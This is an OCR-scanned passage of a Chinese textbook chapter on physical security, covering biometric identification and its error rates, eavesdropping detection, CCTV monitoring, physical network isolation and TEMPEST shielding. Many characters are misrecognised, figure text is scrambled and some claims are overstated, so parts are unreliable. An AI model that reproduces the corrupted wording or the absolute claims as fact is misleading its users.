人 身份 的 鉴定 。 由 于 人 体 特征 具有 人 体 所 固有 的 不 可 复制 的 唯一 性 ,这 一 生物 密 钥 无 法 
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复制 失窃 或 被 遗忘 ,利用 生物 识别 技术 进行 身份 认定 ,安全 、 可 靠 、 准 确 。 

身份 鉴别 可 利用 的 生物 特征 必须 满足 以 下 几 个 条 件 : 

(1) 普遍 性 , 即 必 须 每 个 人 都 具备 这 种 特征 。 

(2) 唯一 性 , 即 任何 两 个 人 的 特征 是 不 一 样 的 。 

(3) 可 测量 性 , 即 特征 可 测量 。 

(4) 稳定 性 , 即 特征 在 一 段 时 间 内 不 改变 。 

在 应 用 过 程 中 ,还 要 考虑 其 他 的 实际 因素 ,比如 ,识别 精度 .识别 速度 ,对 人 体 无 伤害 、 
被 识别 者 的 接受 性 等 等 。 现 在 常用 的 生物 特征 识别 有 : 

(1) 基于 生理 特征 的 生物 识别 技术 : 指纹 识别 .人 脸 识别 .虹膜 识别 . 手 形 识别 、 掌 纹 
识别 、 红 外 温 谱 图 识别 人 耳 识别 .静脉 识别 .基因 识别 等 。 

(2) 基于 行为 特征 的 生物 识别 技术 : 签名 识别 .声音 识别 . 步 态 识别 . 击 键 识别 等 。 

1. 常见 生物 识别 技术 

1) 指纹 识别 

指纹 识别 (Fingerprint Biometrics) 技 术 是 通过 取 像 设备 读 取 指纹 图 像 ,然后 用 计算 
机 识别 软件 分 析 指纹 的 全 局 特征 和 指纹 的 局 部 特征 ,特征 点 如 峰 、 谷 .终点 .分 叉 点 和 分 歧 
点 等 ,从 指纹 中 抽取 特征 值 并 加 密 存储 。 用 户 需 要 认证 时 ,在 指纹 采集 头 重新 按压 手指 ， 
与 已 经 登记 好 的 指纹 进行 比 对 ,就 可 以 非常 可 靠 地 通过 指纹 来 确认 一 个 人 的 身份 。 其 原 
理 如 图 6-2 所 示 。 


指纹 注册 过 程 


指纹 采集 | ~| 指纹 图像 | 一 提取 特征 值 -| 特征 值 模板 入 库 


| ”| 
指纹 比 对 过 各 | 
指纹 采集 上 | 每 直 加 仇 [一 提取 特征 值 | ~| 。 对 比 匹配 。 上 | 一 | 输出 显示 


图 6-2 指纹 识别 基本 原理 


指纹 识别 技术 相对 成 熟 ,指纹 图 像 提取 设备 小 巧 ,是 目前 最 方便 、 可 靠 . 非 侵害 和 价格 
便宜 的 生物 识别 技术 。 苹 果 手 机 iPhone5S 搭载 的 指纹 识别 TouchID 就 成 为 其 一 大 亮 
点 。 指 纹 识 别 的 缺点 在 于 , 它 是 物理 接触 式 的 ,指纹 采集 头 上 留 下 的 印痕 存在 被 用 来 复制 
者 纹 的 可 能 性 。 

2) 人 脸 识 别 

人 脸 识 别 (Facial Biometrics) 技 术 通过 对 面部 特征 和 它们 之 间 的 关系 ,如 眼睛 、 鼻 子 
和 嘴 的 位 置 以 及 它们 之 间 的 相对 位 置 ,来 进行 识别 ,如 图 6-3 所 示 。 基 于 面部 特征 的 识别 
是 复杂 的 ,需要 人 工 智能 和 机 器 知识 学 习 系统 。 用 于 捕捉 面部 图 像 的 两 项 技术 为 标准 视 

(1) 标准 视频 技术 通过 视频 摄像 头 摄取 面部 的 图 像 。 

(2) 热 成 像 技术 通过 分 析 由 面部 毛细 血管 的 血液 产生 的 热线 来 产生 面部 图 像 。 热 成 
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图 6-3 人 脸 识 别 系统 


像 技 术 并 不 需要 较 好 的 光源 ,即使 在 黑暗 情况 下 也 可 以 使 用 。 

人 脸 识 别 技术 的 优点 是 非 接触 性 。 缺 点 是 : 需要 比较 高 级 的 摄像 头 才 可 有 效 高 速 地 
捕捉 面部 图 像 ;而且 使 用 者 面部 的 位 置 与 周围 的 光环 境 都 可 能 影响 系统 的 精确 性 ,人 们 公 
认 面 部 识别 是 最 容易 被 欺骗 的 ;采集 图 像 的 设备 会 比 其 他 技术 昂贵 得 多 。 另 外 ,对 于 因 人 
体面 部 的 如 头发 ,饰物 、 变 老 以 及 其 他 的 变化 ,可 能 需要 通过 人 工 智能 技术 来 得 到 补偿 。 
人 脸 识别 技术 的 改进 依赖 于 提取 特征 与 比 对 技术 的 提高 。 

2013 年 7 月 ,芬兰 创业 公司 Uniqul 和 全 球 最 大 的 在 线 支 付 公 司 paypal 测试 推出 了 
史上 第 一 款 基于 脸 部 识别 系统 的 支付 平台 ,人 脸 识别 技术 进入 了 高 速 发 展期 。 随 后 ,我 国 
中 科 院 也 开发 出 人 脸 识 别 支付 系统 。2015 年 ,国内 多 家 巨头 也 纷纷 加 入 人 脸 识 别 产业 ， 
如 阿里 巴巴 公司 的 “ 刷 脸 支付 ”腾讯 公司 的 “ 优 图 人 脸 识别 ?等 。 

3) 虹膜 识别 

虹膜 识别 (Iris Biometrics) 技 术 是 利用 虹膜 终身 不 变性 和 差异 性 的 特点 来 识别 身份 

。 虹 膜 是 一 种 在 眼睛 瞳孔 内 的 织物 状 的 各 色 环 状 物 ,每 个 虹膜 都 包含 一 个 独一无二 的 
ev eer etre tse 虹膜 在 眼睛 的 内 部 ,用 外 科 手 
术 很 难 改 变 其 结构 。 由 于 瞳孔 随 光线 的 强 弱 变 化 , 想 用 伪造 的 虹膜 代替 活 的 虹膜 是 不 可 
能 的 。 即 使 是 接受 了 角膜 移植 手术 ,虹膜 也 不 会 改变 。 虹 膜 识别 技术 与 相应 的 算法 结合 
后 ,可 以 达到 十 分 优异 的 准确 度 , 即 使 全 人 类 的 虹膜 信息 都 录入 到 一 个 数据 库 中 ,出 现 错 
误 拒绝 和 错误 接收 的 可 能 性 也 相当 小 。 

实验 表明 ,到 目前 为 止 , 虹 膜 识别 是 “最 精确 的 “处理 速度 最 快 的 ”以 及 “最 难 伪造 
的 ?生物 识别 技术 ,也 是 最 昂贵 的 识别 方式 之 一 。 

4) 声音 识别 

声音 识别 (Voice Recognition) 技 术 是 一 种 依据 人 的 行为 特征 进行 识别 的 技术 。 
识别 设备 不 断 地 测量 .记录 声音 的 波形 和 变化 。 而 声音 识别 基于 将 现场 采集 到 的 声音 
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登记 过 的 声音 模板 进行 精确 的 匹配 。 声 音 识别 的 优点 是 : 声音 识别 也 是 一 种 非 接触 的 识 
别 技术 ,用 户 可 以 很 自然 地 接受 。 声 音 识别 的 缺点 : 和 其 他 的 识别 技术 一 样 ,声音 因为 变 
化 的 范围 太 大 ,故而 很 难 进行 一 些 精确 的 匹配 ; 声音 会 随 着 音量 、 速 度 和 音质 的 变化 , 例 
如 感冒 时 的 声音 变化 ,而 影响 比 对 结果 ;目前 来 说 ,还 很 容易 用 录 在 磁带 上 的 声音 来 欺骗 
声音 识别 系统 。 

5) 签名 识别 

签名 识别 (Signature Patterns) 技 术 是 通过 计算 机 把 手写 签名 的 图 像 、. 笔 顺 、 速 度 和 压 
力 等 信息 与 真实 签名 样本 进行 比 对 ,以 鉴别 手写 签名 真 伪 的 技术 。 手 写 签名 作为 身份 认 
证 的 手段 已 经 用 了 几 百 年 了 ,而 且 我 们 都 很 熟悉 在 银行 的 格式 表单 中 签名 作为 我 们 身份 
的 标志 。 签 名 形状 和 相对 位 置 的 相关 参数 包括 : 签名 的 整体 倾斜 角度 .签名 的 宽 高 比 、 签 
名 的 笔迹 长 度 . 签 名 落笔 的 总 时 间 、 签 名 抬 笔 的 总 时 间 \ 书 写 平均 速度 .笔迹 的 压力 变化 信 
息 和 形状 变化 信息 等 。 签 名 识别 易 被 大 众 接受 ,是 一 种 公认 的 身份 识别 技术 。 但 事实 表 
明 人 们 的 签名 在 不 同 的 时 期 和 不 同 的 精神 状态 下 是 不 一 样 的 ,这 就 降低 了 签名 识别 系统 
的 可 靠 性 。 

2. 生物 识别 系统 的 准确 度 

生物 识别 系统 并 不 能 保证 结果 100% 准 确 , 其 准确 度 的 衡量 指标 主要 由 两 部 分 组 成 : 
一 是 错误 拒绝 率 (False Reject Rate,FRR) ,也 就 是 合法 用 户 被 拒绝 通过 的 概率 ;二 是 错误 
接受 率 (False Accept Rate,FAR) ,也 就 是 假冒 的 人 被 通过 的 概率 。 

错误 拒绝 率 FRR 的 含义 是 ,将 相同 的 生物 特征 ,如 指纹 , 误 认 为 是 不 同 的 生物 特征 ， 
而 加 以 拒绝 的 出 错 概率 。FRR 的 大 小 与 系统 设 定 的 判定 相似 度 的 门限 阔 值 呈正 相关 , 即 
相似 度 门 限 国 值 定 得 越 高 ,FRR 的 数值 也 越 高 。 错 误 接受 率 FAR 的 含义 是 ,将 不 同 的 生 
物 特征 误 认为 是 相同 的 生物 特征 ,而 加 以 接受 的 出 错 概率 。FAR 的 大 小 与 相似 度 门 限 国 
值 呈 负 相关 。 

通过 调整 阅 值 等 参数 ,使 系统 FRR 和 FAR 相等 时 ,这 个 错误 率 被 称 为 交叉 错误 率 
(Crossover Error Rate,CER) ,是 衡量 设备 准确 率 的 主要 指标 ,如 图 6-4 所 示 ,CER 为 
FRR 与 FAR 的 交叉 点 。 


错 
误 
FAR FRR 


一 安全 性 
图 6-4 生物 识别 的 准确 度 


3. 多 生物 识别 技术 

生物 特征 识别 系统 在 利用 个 人 特征 来 鉴别 或 验证 用 户 身份 时 ,如 果 检 测 “ 有 噪音 ”, 比 
如 指纹 中 带 有 疤痕 或 者 因 感 冒 而 改变 声音 ,识别 的 准确 度 就 会 下 降 。 如 果 能 够 捕 提 不同 
的 生物 特征 ,同时 融合 兼顾 各 种 识别 算法 ,形成 更 精准 、 更 安全 的 识别 和 检测 机 制 ,那么 生 
物 识别 技术 将 更 加 完善 。 这 也 被 称 为 多 生物 识别 技术 ,或 多 模 态 生物 特征 识别 技术 。 
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对 多 特征 的 融合 常用 的 有 两 种 方法 ,一 种 是 并 行 融合 ; 另 一 种 是 串 行 融合 。 所 谓 并 行 
算法 ,对 各 种 识别 特征 赋予 不 同 的 权 值 ,较为 显著 、 稳 定性 好 、 识 别 效果 好 的 特征 赋予 大 的 
权 值 ;而 易 受 各 类 因素 干扰 稳定 性 较 差 的 特征 赋予 较 小 的 权 值 , 减 小 这 些 特征 对 整体 识 
别 的 影响 。 所 谓 串 行 融合 ,赋予 权 值 方法 与 并 行 融 合 一 致 ,只 是 在 形成 特征 序列 时 为 各 特 
征 序列 的 加 权 之 和 ,从 而 使 所 得 到 的 特征 为 一 个 序列 。 

多 生物 特征 融合 识别 的 优点 在 于 : 首先 ,已 经 证 明 利用 多 个 生物 特征 融合 可 以 提高 
身份 鉴别 的 正确 率 ;其 次 ,利用 多 个 生物 特征 显然 可 以 拓宽 生物 特征 识别 系统 的 应 用 人 和 群 
范围 ;最 后 ,从 防伪 的 角度 ,伪造 多 个 生物 特征 的 难度 远 远大 于 伪造 单一 的 生物 特征 。 

多 生物 识别 技术 发 展 的 核心 在 于 构建 准确 而 快速 的 融合 算法 ,就 是 对 两 种 或 多 种 生 
物 识别 的 标准 都 加 以 计算 和 选择 ,最 后 形成 一 个 统一 的 、 整 体 的 判断 标准 ,这 也 是 多 生物 
识别 技术 未 来 的 发 展 方向 。 
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检测 和 监控 技术 是 保证 信息 系统 物理 安全 的 “眼睛 和 耳 朱 ”。 

1. 检测 技术 

检测 技术 是 针对 窃听 、 窃 照 和 和 窍 视 等 的 防御 技术 ,防止 声音 ,文字 ,数据 ,图 像 等 信息 
的 泄露 。 窃 听 主 要 依赖 于 各 种 * 穷 听 器 ”, 不 同 的 窃听 器 针对 的 对 象 不 同 ,主要 包括 会 议 谈 
话 ` 有 线 电话 无 线 信号 .电磁 辐射 以 及 计算 机 网 络 等 。 随 着 技术 发 展 的 日 新 月 异 ,窃听 已 
经 形成 了 有 线 无线. 激光 、 红 外 .卫星 和 遥感 等 种 类 齐全 的 庞大 窃听 家 族 ,而 且 被 窃听 的 
对 象 也 已 从 军事 机 密 向 商业 活动 甚至 平民 生活 发 展 。 

有 线 窃听 ,是 指 秘密 侵入 他 人 之 间 的 有 线 通信 线路 ,探知 其 通信 内 容 , 如 对 固定 电话 
的 监听 。 无 线 窃听 ,是 指 对 无 线 通信 线路 的 秘密 侵入 ,如 对 移动 电话 的 监听 。 激 光 窃 听 ， 
就 是 用 激光 发 生 器 产生 一 东 极 细 的 红外 激光 , 射 到 被 窃听 房间 的 玻璃 上 , 当 房 间 里 有 人 谈 
话 的 时 候 ,玻璃 因 受 室内 声音 变化 的 影响 而 发 生 轻 微 的 振动 ,从 玻璃 上 反射 回来 的 激光 包 
含 了 室内 声波 振动 信息 ,这 些 信息 可 以 还 原 成 为 音频 信息 。 辐 射 窃听 ,是 利用 各 种 电子 设 
备 存在 的 电磁 泄漏 ,收集 电磁 信号 并 还 原 , 得 到 相应 信息 。 计 算 机 网 络 窃听 主要 是 指 通过 
在 网 络 的 特殊 位 置 安装 窃听 软件 ,接收 能 够 收 到 的 一 切 信息 ,并 分 析 还 原 为 原始 信息 。 

检测 技术 可 采用 电缆 加 压 技 术 、 电 磁 辐 射 检 测 技术 、 激 光 探 测 技术 等 ,搜索 发 现 窃听 
装置 ,以 消除 窃听 行为 。 防 窃听 技术 除了 检测 之 外 ,还 可 以 采用 基于 密码 编码 技术 对 原始 
信息 进行 加 密 处 理 , 确 保 信 息 即 使 被 截获 也 无 法 还 原 出 原始 信息 。 此 外 ,电磁 信号 屏蔽 也 
属于 窃听 防御 技术 。 

2. 监控 技术 

监控 技术 主要 是 指 利 用 光电 、 超 声 、 微 波 、 红 外 、 压 感 等 传感器 ,来 检测 区 域 访问 并 报 
警 。 监 控 系统 是 安防 系统 中 应 用 最 多 的 系统 之 一 ,视频 监控 系统 发 展 划分 为 第 一 代 模 拟 
视频 监控 系统 , 即 闭路 电视 (Closed Circuit Television,CCTV) ,到 第 二 代 基 于 “PC 十 多 媒 
体 卡 ” 数 字 视 频 监控 系统 (Digital Video Recorder,DVR) ,到 第 三 代 完 全 基于 IP 网 络 视 频 
监控 系统 (IP Video Surveillance,IPVS)。 

CCTYV 使 用 照相 机 通过 传输 媒介 将 图 片 传送 到 连接 显示 器 的 电视 传输 系统 ,传输 媒 
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介 可 以 使 用 光缆 、 微 波 .无 线 电波 或 红外 光束 ,模拟 视频 设备 包括 视频 画面 分 割 器 ,矩阵 、 
切换 器 .卡带 式 录 像 机 (VCR) 及 视频 监视 器 等 。CCTYV 根据 图 像 信号 的 清晰 度 ,分 为 下 
面 三 个 等 级 : 

(1) 检测 级 : 能 够 检测 到 对 象 的 存在 。 

(2) 识别 级 : 能 够 检测 到 对 象 的 类 型 。 

(3) 确认 级 : 能 够 分 辨 对 象 的 细节 。 

部 署 CCTYV 的 关键 在 于 : 

(1) 充分 理解 设施 的 整个 监控 需求 。 

(2) 确定 需要 监控 的 区 域 大 小 ,深度 、 宽 度 来 决定 照相 机 镜头 的 尺寸 。 

(3) 照明 非常 重要 ,不 同 的 灯光 和 照明 将 提供 不 同 的 效果 等 级 。 照 明 设备 应 该 在 黑 
暗中 能 够 提供 持续 的 覆盖 程度 ,对 象 与 背景 的 对 比 度 也 非常 重要 。 

“模拟 -数字 ”监控 系统 是 以 数字 硬盘 录像 机 DVR 为 核心 半 模 拟 -半数 字 方 案 , 从 摄像 
机 到 DVR 仍 采用 同 轴 缆 输出 视频 信号 ,通过 DVR 同时 支持 录像 和 回放 ,并 可 支持 有 限 
IP 网 络 访问 。 

监控 技术 最 大 的 缺陷 在 于 , 它 是 一 种 被 动 的 设备 ,并 不 能 阻止 人 侵 。 因 此 ,可 以 与 其 
他 的 控制 措施 配合 使 用 ,如 于 墙 `. 巡逻 .报警 系统 等 。 
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即使 是 最 先进 的 防火 墙 技术 ,也 不 可 能 100% 保 证 系统 安全 。 屡 次 发 生 的 网 络 入 侵 
及 泄露 事件 ,使 人 们 认识 到 : 理论 上 说 ,只 有 一 种 真正 安全 的 隔离 手段 , 那 就 是 从 物理 上 
断 开 连接 。 有 鉴于 此 ,我 国 国家 保密 局 2000 年 1 月 1 日 起 实施 的 (计算 机 信息 系统 国际 
互联 网 保密 管理 规定 ) 的 第 二 章 第 六 条 要 求 :“ 涉 及 国家 机 密 的 计算 机 信息 系统 ,不 得 直 
接 或 间接 地 与 国际 互联 网 或 其 他 公共 信息 网 络 相 连 ,必须 实行 物理 隔离 。 ”包括 美 国 在 内 
的 许多 国家 也 都 利用 物理 隔离 ,来 解决 政府 和 军事 涉 密 网 络 与 公共 网 络 连接 时 的 安全 。 

1. 什么 是 物理 隔离 

物理 隔离 到 目前 为 止 没有 一 个 十 分 严格 的 定义 , 较 早 时 用 于 描述 的 英文 单词 为 
Physical Disconnection ,后 来 使 用 词汇 Physical Separation 和 Physical Isolation。 这 些 词 
汇 共 有 的 含义 都 是 与 公用 网 络 彻 底 的 断 开 连 接 , 但 这 样 背离 了 网 络 的 初衷 ,同时 给 工作 带 
来 不 便 。 目 前 ,很 多 人 开始 使 用 Physical Gap 这 个 词汇 ,直译 为 物理 隔离 , 意 为 通过 制造 
物理 的 豁口 来 达到 物理 隔离 的 目的 。 

物理 隔离 首先 要 考虑 的 是 安全 域 的 问题 。 国 家 的 安全 域 一 般 以 信息 涉 密 程度 划分 为 
涉 密 域 和 非 涉 密 域 。 涉 密 域 就 是 涉及 国家 秘密 的 网 络 空间 ; 非 涉 密 域 不 涉及 国家 的 秘密 ， 
但 是 涉及 本 单位 、 本 部 门 或 者 本 系统 的 工作 秘密 。 公 共 服 务 域 是 指 不 涉及 国家 秘密 ,也 不 
涉及 工作 秘密 ,向 互联 网 完全 开放 的 公共 信息 交换 空间 。 类 似 地 ,企业 的 安全 域 一 般 分 为 
企业 内 网 .企业 外 网 和 公 网 (Internet) 。 

物理 隔离 实际 上 就 是 指 ,内 部 网 不 直接 或 间接 地 连接 公共 网 。 物 理 隔离 的 解决 思路 
是 : 在 同一 时 间 、 同 一 空间 单个 用 户 是 不 可 能 同时 使 用 两 个 系统 的 ,总 有 一 个 系统 处 于 
“空闲 ?状态 ,这 样 只 要 使 两 个 系统 在 空间 上 物理 隔离 ,就 可 以 使 它们 的 安全 性 相互 独立 。 
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最 初 的 物理 隔离 是 建立 两 套 网 络 系统 和 计算 机 设备 : 一 套用 于 内 部 办 公 , 另 一 套用 
于 与 互联 网 连接 。 这 样 的 两 套 互 不 连接 的 系统 ,不 仅 成 本 高 ,而 且 极 为 不 便 。 这 一 矛盾 促 
进 了 物理 隔离 设备 的 开发 ,也 迫切 需要 一 套 技术 标准 和 方案 。 

如 果 将 一 个 企业 涉及 的 网 络 分 为 内 网 、 外 网 和 公 网 ,其 安全 要 求 应 该 是 : 

(1) 在 公 网 和 外 网 之 间 实 行 逻辑 隔离 ; 

(2) 在 内 网 和 外 网 之 间 实 行 物 理 隔 离 。 

具体 拓扑 形式 如 图 6-5 所 示 。 


物理 隔离 逻辑 隔离 


图 6-5 企业 网 络 的 划分 

要 实现 内 网 与 外 网 之 间 物 理 隔离 的 目的 ,必须 保证 做 到 以 下 几 点 : 

(1) 阻 断 网 络 的 直接 连接 , 即 三 个 网 络 不 会 同时 连 在 隔离 设备 上 。 

(2) 阻 断 网 络 的 Internet 逻辑 连接 , 即 TCP/IP 的 协议 必须 被 剥离 ,原始 数据 通过 点 
到 点 协议 而 非 TCP/IP 协议 透 过 隔离 设备 进行 传输 。 

(3) 隔离 设备 的 传输 机 制 具 有 不 可 编程 的 特性 ,因此 不 具有 感染 的 特性 。 

(4) 任何 数据 都 是 通过 两 级 移动 代理 的 方式 来 完成 ,两 级 移动 代理 之 间 是 物理 隔 
离 的 。 

(5) 隔离 设备 具有 审查 功能 。 

(6) 隔离 设备 传输 的 原始 数据 ,不 具有 攻击 或 对 网 络 安全 有 害 的 特性 ,如 txt 文本 不 
会 有 病毒 一 样 ,也 不 会 执行 命令 等 。 

(7) 强大 的 管理 和 控制 功能 。 

(8) 从 隔离 的 内 容 看 ,隔离 分 为 网 络 隔离 和 数据 隔离 。 数 据 隔离 主要 是 指 存储 设备 
的 隔离 , 即 一 个 存储 设备 不 能 被 几 个 网 络 共享 。 网 络 隔离 就 是 把 被 保护 的 网 络 从 公开 的 、 
无 边界 的 、 自 由 的 环境 中 独立 出 来 。 只 有 实现 了 两 种 隔离 , 才 是 真正 意义 上 的 物理 隔离 。 

此 外 ,还 应 该 在 物理 辐射 上 阻 断 内 部 网 和 外 部 网 ,确保 内 部 网 络 信 息 不 会 通过 电磁 辐 
射 或 耦合 方式 泄露 到 外 部 网 。 

物理 隔离 技术 主要 应 用 于 需要 对 内 部 重要 数据 进行 安全 保护 的 国家 各 级 政府 部 门 、 
军队 系统 金融 系统 等 。 这 些 部 门 对 网 络 安全 有 更 高 的 要 求 ,严格 禁止 信息 泄露 和 被 算 
改 , 而 且 出 于 信息 交换 的 需要 ,不 能 够 完全 隔离 与 外 部 网 络 的 联系 。 

2. 网 络 物理 隔离 的 基本 形式 

1) 用 户 级 物理 隔离 

用 户 级 物理 隔离 的 目的 ,是 使 一 台 计 算 机 既 连 接 内 网 又 连接 外 网 ,可 以 在 不 同 网 络 上 
分 时 地 工作 ,在 保证 内 、 外 网 络 隔离 的 同时 节省 资源 、 方 便 工作 。 用 户 级 物理 隔离 自 出 现 
至 今 经 过 多 次 演变 ,经 历 了 两 个 发 展 阶段 ,不 断 发 展 成 熟 。 

(1) 第 一 代 物 理 隔离 技术 : 完全 隔离 。 完 全 隔离 主要 采用 双 机 物理 隔离 技术 ,其 主 
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要 原理 是 将 两 套 主板 ,芯片 ,网 卡 和 硬盘 的 系统 合并 为 一 台 计 算 机 使 用 ,用 户 通过 客户 端 
的 开关 来 选择 两 套 计算 机 操作 系统 ,切换 内 外 网 络 的 连接 。 双 机 物理 隔离 的 维护 和 使 用 
都 不 够 便利 。 

(2) 第 二 代 物 理 隔离 技术 : 硬件 卡 隔离 。 硬 件 卡 隔离 的 原理 是 在 主机 的 主板 搬 槽 中 
安装 物理 隔离 卡 ,把 一 台 普 通 计 算 机 分 成 两 台 虚 拟 计算 机 ,来 实现 物理 隔离 。 硬 件 卡 隔 
离 ,分 为 双 硬 盘 、 单 硬盘 物理 隔离 系统 两 种 。 

双 硬 盘 物 理 隔离 系统 ,如 图 6-6, 即 客户 端 增加 一 块 物理 隔离 卡 ,客户 端的 硬盘 或 其 
他 的 存储 设备 首先 连接 到 该 卡 ,然后 再 转 接 到 主板 上 ,隔离 卡 可 以 控制 客户 端的 选择 。 选 
择 不 同 的 硬盘 时 ,同时 选择 了 该 卡 不 同 的 网 络 接口 。 这 种 隔离 产品 有 的 仍然 需要 网 络 布 
线 为 双 网 线 结构 ,存在 较 大 的 安全 隐患 。 


图 6-6 双 硬 盘 物理 隔离 系统 


单 硬 盘 物 理 隔 离 系统 ,通过 对 单个 硬盘 上 磁道 的 读 写 控制 技术 ,在 一 个 硬盘 上 分 隔 出 
两 个 独立 的 工作 区 间 ,其 中 一 个 为 公共 区 (Public) , 另 一 个 为 安全 区 (Secure)。 这 两 个 区 
分 别 装 有 两 个 操作 系统 ,用 户 可 以 在 本 地 通过 操作 系统 上 的 一 个 切换 图 标 自由 选择 内 外 
两 个 不 同 网 络 。 用 户 在 任意 时 间 只 能 与 其 中 一 个 网 络 相 连 , 这 两 个 区 之 间 无 法 互相 访问 。 

2) 网 络 级 物理 隔离 

网 络 级 物理 隔离 技术 最 早 采用 隔离 集线器 的 方式 。 隔 离 集线器 相当 于 内 网 和 外 网 两 
个 集线器 的 集成 ,通过 电子 开关 进行 切换 ,从 而 连接 到 内 网 或 外 网 两 者 之 一 。 隔 离 集线器 
只 有 在 与 其 他 隔离 措施 ,如 物理 隔离 卡 等 相配 合 , 才 能 实现 真正 的 物理 隔离 。 

(1) 第 三 代 物 理 隔离 技术 : 数据 转播 隔离 。 数 据 转播 隔离 ,利用 因特网 信息 传播 服 
务 器 分 时 复制 转播 文件 的 途径 实现 隔离 ,是 一 种 非 实时 的 因特网 访问 方式 。 采 集 服务 器 
下 载 指定 网 站 的 内 容 , 转 播 服务 器 使 用 下 载 的 数据 建立 网 站 的 镜像 站 点 ,向 内 部 用 户 提供 
虚拟 的 Internet 站 点 访问 。 用 户 只 是 访问 了 指定 站 点 的 镜像 ,访问 内 容 有 较 大 的 局 限 性 。 

(2) 第 四 代 物 理 隔离 技术 : 空气 开关 隔离 。 空 气 开关 隔离 通过 使 用 单刀 双 掷 开关， 
使 得 内 外 部 网 络 分 时 访问 临时 缓冲 器 来 完成 数据 交换 ,其 基本 功能 框图 如 图 6-7 所 示 。 

该 隔离 系统 由 隔离 服务 器 和 防火 墙 组 成 。 隔 离 服务 器 有 内 部 网 络 和 外 部 网 络 两 个 接 
口 ,但 不 能 同时 连接 两 个 网 络 ,而 是 利用 一 个 切换 开关 ,使 服务 器 在 连接 内 网 时 断 开 外 网 ， 
连接 外 网 时 断 开 内 网 。 内 网 用 户 要 从 外 网 下 载 数 据 时 ,隔离 服务 器 首先 连接 外 网 ,将 数据 
暂 存在 服务 器 中 , 隔 一 定时 间 后 断 开 外 网 ,连接 内 网 ,将 数据 发 送 到 内 部 网 络 中 。 内 外 网 


第 6 章 物理 安全 \@®/ 


hE 


最 Internet 


防火 墙 
图 6-7 空气 开关 隔离 技术 


之 间 的 切换 非常 快 ,用 户 基本 感觉 不 到 时 延 。 为 防止 信息 泄露 及 黑客 人 侵 , 外 部 数据 进入 
内 网 前 经 过 防火 墙 的 过 滤 。 

(3) 第 五 代 物 理 隔离 技术 : 安全 通道 隔离 。 安 全 通道 隔离 ,通过 专用 通信 设备 . 专 有 
安全 协议 和 加 密 验 证 机 制 及 应 用 层 数据 提取 和 鉴别 认证 技术 ,进行 不 同安 全 级 别 网 络 之 
间 的 数据 交换 ,彻底 阻 断 了 网 络 间 的 直接 TCP/IP 连接 ,同时 对 网 间 通 信 的 双方 .内 容 . 过 
程 施 以 严格 的 身份 认证 内容 过 滤 、 安 全 审计 等 多 种 安全 防护 机 制 , 从 而 保证 了 网 间 数 据 
交换 的 安全 可 控 , 杜 绝 由 于 操作 系统 和 网 络 协 议 自身 漏洞 带 来 的 安全 风险 ,成 为 当前 隔 
离 技 术 的 发 展 方向 。 

这 种 信息 隔离 与 交换 系统 ,俗称 网 闸 ,网 闸 的 设计 是 “代理 十 摆渡 ”, 如 图 6-8 所 示 。 
当 外 网 需要 有 数据 到 达 内 网 的 时 候 (B 点 ) ,外 部 的 服务 器 立即 发 起 对 隔离 设备 的 非 
TCP/IP 协议 的 数据 连接 ,一 般 是 不 可 路 由 的 私有 协议 ,隔离 设备 将 所 有 的 协议 和 剥离 或 重 
组 ,将 原始 的 数据 写 人 存储 介质 (C 点 )。 根 据 不 同 的 应 用 ,可 能 有 必要 对 数据 进行 完整 性 
和 安全 性 检查 ,如 网 络 协议 检查 、 防 病毒 和 恶意 代码 扫描 等 。 一 旦 数据 完全 写 入 隔离 设备 
的 存储 介质 ,隔离 设备 立即 中 断 与 外 网 的 连接 , 转 而 发 起 对 内 网 的 非 TCP/IP 协议 的 数据 
连接 。 隔 离 设备 将 存储 介质 内 的 数据 通过 专用 隔离 硬件 交换 到 内 网 处 理 单元 (A 点 )。 
内 网 收 到 数据 后 ,立即 进行 TCP/IP 的 封装 和 应 用 协议 的 封装 ,并 交 给 应 用 系统 。 在 控制 
台 收 到 完整 的 交换 信号 之 后 。 隔 离 设备 立即 切断 隔离 设备 与 内 网 的 直接 连接 。 


内 网 网 口 外 网 网 口 
内 网 处 理 单元 ” 置 转 外 网 处 理 单元 


B 点 


1 隔离 与 交换 
| 控制 单元 


数据 交换 区 
图 6-8 安全 通道 隔离 技术 原理 


625 防 信息 泄露 技术 
计算 机 主机 及 其 附属 电子 设备 ,如 视频 显示 终端 ,打印 机 等 ,在 工作 时 不 可 避免 地 会 
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产生 电磁 辐射 ,这 些 辐射 中 携带 有 计算 机 正在 进行 处 理 的 数据 信息 。 尤 其 是 显示 器 ,由 于 
显示 的 信息 是 给 人 阅读 的 ,是 不 加 任何 保密 措施 的 ,所 以 其 产生 的 辐射 也 最 容易 造成 汇 
密 。 使 用 专门 的 高 灵敏 接收 设备 将 这 些 电 磁 辐 射 接收 下 来 ,经 过 分 析 还 原 , 就 可 以 恢复 出 
原 信息 。 

针对 这 一 现象 ,美国 国家 安全 局 开展 了 一 项 绝密 项 目 , 后 来 产生 了 TEMPEST 
(Transient Electromagnetic Pulse Emanation Standard) 技 术 及 相关 产品 。TEMPEST 技 
术 又 称 计算 机 信息 泄露 安全 防护 技术 ,包括 泄露 信息 的 分 析 、 预 测 、 接 收 、 识 别 、 复 原 、 防 
护 、 测 试 、 安 全 评估 等 多 项 技术 ,涉及 多 个 学 科 领 域 。 加 解密 等 常规 信息 安全 技术 ,并 不 能 
解决 输入 和 输出 端的 电磁 信息 泄露 问题 ,如 CRT 显示 、 打 印 机 打印 信息 等 。 

TEMPEST 防 电磁 泄漏 的 基本 思想 主要 包括 三 个 层面 : 

(1) 抑制 电磁 发 射 。 采 取 各 种 措施 想 办 法 减少 显示 器 .打印 机 等 输入 输出 设备 电路 
的 电磁 辐射 。 

(2) 屏蔽 隔离 。 在 其 周围 利用 各 种 屏蔽 材料 使 电磁 发 射 场 衰 减 到 足够 小 ,不 易 被 接 
收 , 甚 至 接收 不 到 。 例 如 ,对 于 需要 高 度 保密 的 信息 ,如 军政 首脑 机 关 的 信息 中 心 和 驻 外 
使 馆 等 地 方 ,应 该 将 信息 中 心 的 机 房 整个 屏蔽 起 来 。 屏 项 的 方法 是 采用 接地 的 金属 网 把 
整个 房间 屏蔽 起 来 。 小 型 系统 可 以 把 需要 屏蔽 的 计算 机 和 外 部 设备 放 在 体积 较 小 的 屏 项 
箱 内 。 

(3) 相关 干扰 。 在 计算 机 旁边 放置 一 个 辐射 带宽 相近 的 干扰 器 ,不 断 地 向 外 辐射 干 
扰 电 磁 波 ,扰乱 计算 机 发 出 的 信息 电磁 波 , 使 相关 电磁 泄漏 即使 被 接收 也 无 法 识别 。 
